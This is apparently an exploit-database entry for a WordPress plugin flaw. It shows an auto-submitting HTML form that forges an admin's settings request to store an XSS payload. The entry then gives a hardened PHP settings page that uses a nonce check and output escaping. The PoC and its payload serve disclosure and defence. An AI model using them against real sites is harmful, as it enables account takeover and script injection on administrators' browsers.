## https://sploitus.com/exploit?id=WPEX-ID:93FAAD5B-E1E8-4E49-B19E-B91343D68B51
Create an HTML file with the following content and have a logged-in admin access it:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=subscribers_text_counter" method="POST">
        <input type="text" name="twitter" value='"><svg/onload=alert(2);>'>
        <input type="text" name="stextcount_hidden" value="settings">
        <input type="submit" value="submit">
    </form>
</body>
```

Navigate to the plugin's settings to trigger the XSS.
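The defensive counterpart, as an added example that is not the plugin's own code: a settings page that rejects the cross-site form above and encodes the stored value on output. The function name `stc_settings_page`, the option name `stc_twitter` and the nonce names are hypothetical; the field names `twitter` and `stextcount_hidden` are taken from the form above.

```php
<?php
// Added example: hardened settings page for a plugin option.
// stc_settings_page, stc_twitter, stc_save_settings and stc_nonce are hypothetical names.

function stc_settings_page() {
    // Only administrators may view or change the settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to manage these settings.' ) );
    }

    if ( isset( $_POST['stextcount_hidden'] ) && 'settings' === $_POST['stextcount_hidden'] ) {
        // CSRF defence: stops the request unless it carries a valid nonce for this action.
        // A form auto-submitted from another site has no way to supply that nonce.
        check_admin_referer( 'stc_save_settings', 'stc_nonce' );

        // Input handling: remove the slashes WordPress adds, then strip tags and line breaks.
        $twitter = isset( $_POST['twitter'] )
            ? sanitize_text_field( wp_unslash( $_POST['twitter'] ) )
            : '';
        update_option( 'stc_twitter', $twitter );
    }

    $twitter = get_option( 'stc_twitter', '' );
    ?>
    <form method="post">
        <?php wp_nonce_field( 'stc_save_settings', 'stc_nonce' ); ?>
        <input type="hidden" name="stextcount_hidden" value="settings">
        <!-- Output encoding: esc_attr() keeps a stored quote from closing the value attribute. -->
        <input type="text" name="twitter" value="<?php echo esc_attr( $twitter ); ?>">
        <?php submit_button(); ?>
    </form>
    <?php
}
```

The nonce check and the output encoding are independent layers: the first blocks the forged request, the second keeps a value that was already stored from executing when the settings page is rendered.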